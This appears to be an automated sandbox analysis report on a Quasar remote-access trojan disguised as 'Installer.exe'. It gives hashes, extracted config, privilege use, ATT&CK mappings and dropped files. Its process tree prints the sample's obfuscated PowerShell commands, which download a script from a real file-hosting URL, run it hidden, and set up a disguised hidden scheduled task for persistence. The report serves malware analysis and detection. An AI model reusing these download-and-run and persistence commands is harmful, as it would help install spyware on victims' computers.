quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
104s
max time network
153s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250410-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
19/04/2025, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Installer.exe
Size

53KB
MD5

f323bb458ecbd21acdddd5ea770e775f
SHA1

9b04a6ea2e6efcc81d344f6425928c5700e9a3f6
SHA256

4030427f5e93a3cbb5072fe12afb02a4cb6447a4d0061b4dc9f71fdb783ab926
SHA512

ca08182341611a89da1f4c90efbd065691a551e68d534ed509bf3ffca8d821362be14b175cfb8378fc2199432938c1d3e63524d9424802a37c0435467a5dabe2
SSDEEP

768:ZId0rRueeCTXZJa0CMpWBUlNP/hA8OE2fbsE/g0+EFiRs:ZId+KQXZPCiWBU8fAL5eim

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral5/memory/5228-59-0x000001F550D60000-0x000001F550EEE000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

flow	pid	Process
20	4556	powershell.exe
51	5228	powershell.exe
53	5228	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4784	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5228	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4784	powershell.exe
4784	powershell.exe
4556	powershell.exe
4556	powershell.exe
5228	powershell.exe
5228	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3340	Installer.exe
Token: SeBackupPrivilege	3340	Installer.exe
Token: SeDebugPrivilege	3340	Installer.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeIncreaseQuotaPrivilege	4784	powershell.exe
Token: SeSecurityPrivilege	4784	powershell.exe
Token: SeTakeOwnershipPrivilege	4784	powershell.exe
Token: SeLoadDriverPrivilege	4784	powershell.exe
Token: SeSystemProfilePrivilege	4784	powershell.exe
Token: SeSystemtimePrivilege	4784	powershell.exe
Token: SeProfSingleProcessPrivilege	4784	powershell.exe
Token: SeIncBasePriorityPrivilege	4784	powershell.exe
Token: SeCreatePagefilePrivilege	4784	powershell.exe
Token: SeBackupPrivilege	4784	powershell.exe
Token: SeRestorePrivilege	4784	powershell.exe
Token: SeShutdownPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeSystemEnvironmentPrivilege	4784	powershell.exe
Token: SeRemoteShutdownPrivilege	4784	powershell.exe
Token: SeUndockPrivilege	4784	powershell.exe
Token: SeManageVolumePrivilege	4784	powershell.exe
Token: 33	4784	powershell.exe
Token: 34	4784	powershell.exe
Token: 35	4784	powershell.exe
Token: 36	4784	powershell.exe
Token: SeIncreaseQuotaPrivilege	4784	powershell.exe
Token: SeSecurityPrivilege	4784	powershell.exe
Token: SeTakeOwnershipPrivilege	4784	powershell.exe
Token: SeLoadDriverPrivilege	4784	powershell.exe
Token: SeSystemProfilePrivilege	4784	powershell.exe
Token: SeSystemtimePrivilege	4784	powershell.exe
Token: SeProfSingleProcessPrivilege	4784	powershell.exe
Token: SeIncBasePriorityPrivilege	4784	powershell.exe
Token: SeCreatePagefilePrivilege	4784	powershell.exe
Token: SeBackupPrivilege	4784	powershell.exe
Token: SeRestorePrivilege	4784	powershell.exe
Token: SeShutdownPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeSystemEnvironmentPrivilege	4784	powershell.exe
Token: SeRemoteShutdownPrivilege	4784	powershell.exe
Token: SeUndockPrivilege	4784	powershell.exe
Token: SeManageVolumePrivilege	4784	powershell.exe
Token: 33	4784	powershell.exe
Token: 34	4784	powershell.exe
Token: 35	4784	powershell.exe
Token: 36	4784	powershell.exe
Token: SeIncreaseQuotaPrivilege	4784	powershell.exe
Token: SeSecurityPrivilege	4784	powershell.exe
Token: SeTakeOwnershipPrivilege	4784	powershell.exe
Token: SeLoadDriverPrivilege	4784	powershell.exe
Token: SeSystemProfilePrivilege	4784	powershell.exe
Token: SeSystemtimePrivilege	4784	powershell.exe
Token: SeProfSingleProcessPrivilege	4784	powershell.exe
Token: SeIncBasePriorityPrivilege	4784	powershell.exe
Token: SeCreatePagefilePrivilege	4784	powershell.exe
Token: SeBackupPrivilege	4784	powershell.exe
Token: SeRestorePrivilege	4784	powershell.exe
Token: SeShutdownPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeSystemEnvironmentPrivilege	4784	powershell.exe
Token: SeRemoteShutdownPrivilege	4784	powershell.exe
Token: SeUndockPrivilege	4784	powershell.exe
Token: SeManageVolumePrivilege	4784	powershell.exe
Token: 33	4784	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5228	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3340 wrote to memory of 4756	3340	Installer.exe	85
PID 3340 wrote to memory of 4756	3340	Installer.exe	85
PID 4756 wrote to memory of 3852	4756	cmd.exe	86
PID 4756 wrote to memory of 3852	4756	cmd.exe	86
PID 3852 wrote to memory of 1036	3852	winAPI.dll	87
PID 3852 wrote to memory of 1036	3852	winAPI.dll	87
PID 1036 wrote to memory of 4608	1036	cmd.exe	88
PID 1036 wrote to memory of 4608	1036	cmd.exe	88
PID 4608 wrote to memory of 3488	4608	cmd.exe	89
PID 4608 wrote to memory of 3488	4608	cmd.exe	89
PID 4608 wrote to memory of 4784	4608	cmd.exe	90
PID 4608 wrote to memory of 4784	4608	cmd.exe	90
PID 4608 wrote to memory of 4556	4608	cmd.exe	92
PID 4608 wrote to memory of 4556	4608	cmd.exe	92
PID 4608 wrote to memory of 5228	4608	cmd.exe	100
PID 4608 wrote to memory of 5228	4608	cmd.exe	100
PID 5228 wrote to memory of 5508	5228	powershell.exe	101
PID 5228 wrote to memory of 5508	5228	powershell.exe	101
PID 5508 wrote to memory of 5372	5508	csc.exe	102
PID 5508 wrote to memory of 5372	5508	csc.exe	102

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3488	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Installer.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4756
- - C:\Users\Admin\AppData\Local\Temp\winAPI.dll
    winAPI.dll
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1036
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4608
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:3488
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4784
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:4556
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:5228
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gxdmf5mn\gxdmf5mn.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5508
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES110.tmp" "c:\Users\Admin\AppData\Local\Temp\gxdmf5mn\CSC766A8E5211C0432FB1CFACA4D0333E92.TMP"
        8⤵
        
        PID:5372

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4bdcd30fb17b371bd160a7781fe0086

SHA1
66454bb74777af326b69bdcb2866dffdaedf97e7

SHA256
1299fe43541d9b36a771775f73010727f4ec19fa97dd18a49fa6d8b1d3ab9071

SHA512
0f3104e85172862a727cbbe216e2be00e159e7f23ab7c3ab9227aa9117a81047ed773650a5798b72339c0c36276d5919a92c9700d7876491f46796ee60d20557

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c39803ca784d4c8af646affe146c7d45

SHA1
d16916f2b4b63a4b31eebdca571e7a499a3f4592

SHA256
824e6b01a4d8d9834c6594ba4ac40faedc9c90b7215d8fd22b0e084bf2d71946

SHA512
60c59075b793bcc183dc378c4f808eefbe68a50a8e7d9e89972b15779df0f704c597be7b09cfed73624cdb652d9d4a2e14a1f1cbbd08b5cb37b60e5957344fb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES110.tmp

Filesize
1KB

MD5
33836bbe8feb32facedeac94f75f93d3

SHA1
84cc1a8fa10a7a68cd392cbe1c7010f86babf752

SHA256
b1cd84a6d11079a0ec7ee8b44571d49b420e16916f116f4cf58e734042d00c1f

SHA512
52a6778f16aa14ec71f9b1ebda1574dd4d4f9b151a408d725ce20188c6694d44c44b867fb6740a24d54fdfde03c389b3bffcc5fbe3356f25b64c3ce60ccaddf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iytbua0f.dvn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gxdmf5mn\gxdmf5mn.dll

Filesize
3KB

MD5
6f8d251490b0eba212c4c818d833c37a

SHA1
80c98fb9c67b527a6d76139b5b58b4f55bd9495d

SHA256
1f46ff88241dbb9f55c553c68cbe0c6e1cc107d260cecdf506c1ed569bbf3143

SHA512
330fbea3fd4eecbb1cab4d88af88b83d9bd123fef09efb223fbdce8c86f32f103b8edde6af8796f86abfe28ea70181dd1a4688dd64d7eded0527279909a25f2a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gxdmf5mn\CSC766A8E5211C0432FB1CFACA4D0333E92.TMP

Filesize
652B

MD5
30a5717b53b8a2a182b73c8478d7a2f7

SHA1
7e457bcb9f1cc116e4271a536c5a34b694d62b4d

SHA256
e77cbf912889580d906c491a1a1d713b04fe7a12e7e1d07b8dcd52e7bb1abf37

SHA512
30b62342315cbf75f34da3ef618a0e3040dc5bc7333562855a59986a2f1117f795b0ab7a9c6b87b92903f62c6de4c35583894de573521aee68ccec053ee8cf47

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gxdmf5mn\gxdmf5mn.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gxdmf5mn\gxdmf5mn.cmdline

Filesize
369B

MD5
4c81d198d5e9a2153dae879ebad0c37a

SHA1
c134f365b4a62d68cbf3f72daa1f5fae0ba6a761

SHA256
a0bdd28816eee1159f54aef848ced73f3a1d8e1a89e1e0d70f4d69017eb5f9f4

SHA512
cc97ecb1266b54e8d980f5a348f85e7c71205792b63a8f21acca2bee0d657e5f092cfe22ad570ffa0ed4a70f10ca9b6153c6bb85333a3c754eb027dae47b0eba

Download Submit
memory/3340-29-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/3340-0-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/3340-27-0x0000000100400000-0x000000010040D000-memory.dmp

Filesize
52KB

Download
memory/4784-4-0x000001D176D80000-0x000001D176DA2000-memory.dmp

Filesize
136KB

Download
memory/5228-62-0x000001F550BC0000-0x000001F550BFA000-memory.dmp

Filesize
232KB

Download
memory/5228-64-0x000001F551F80000-0x000001F552032000-memory.dmp

Filesize
712KB

Download
memory/5228-59-0x000001F550D60000-0x000001F550EEE000-memory.dmp

Filesize
1.6MB

Download
memory/5228-60-0x000001F50D890000-0x000001F50D8AA000-memory.dmp

Filesize
104KB

Download
memory/5228-61-0x000001F538500000-0x000001F538512000-memory.dmp

Filesize
72KB

Download
memory/5228-55-0x000001F50D850000-0x000001F50D858000-memory.dmp

Filesize
32KB

Download
memory/5228-63-0x000001F550C50000-0x000001F550CA0000-memory.dmp

Filesize
320KB

Download
memory/5228-57-0x000001F550750000-0x000001F5508BA000-memory.dmp

Filesize
1.4MB

Download
memory/5228-65-0x000001F550C00000-0x000001F550C4E000-memory.dmp

Filesize
312KB

Download
memory/5228-66-0x000001F550CC0000-0x000001F550D0C000-memory.dmp

Filesize
304KB

Download
memory/5228-68-0x000001F538510000-0x000001F53853A000-memory.dmp

Filesize
168KB

Download
memory/5228-67-0x000001F550D10000-0x000001F550D5A000-memory.dmp

Filesize
296KB

Download
memory/5228-69-0x000001F551D30000-0x000001F551D42000-memory.dmp

Filesize
72KB

Download
memory/5228-70-0x000001F551D90000-0x000001F551DCC000-memory.dmp

Filesize
240KB

Download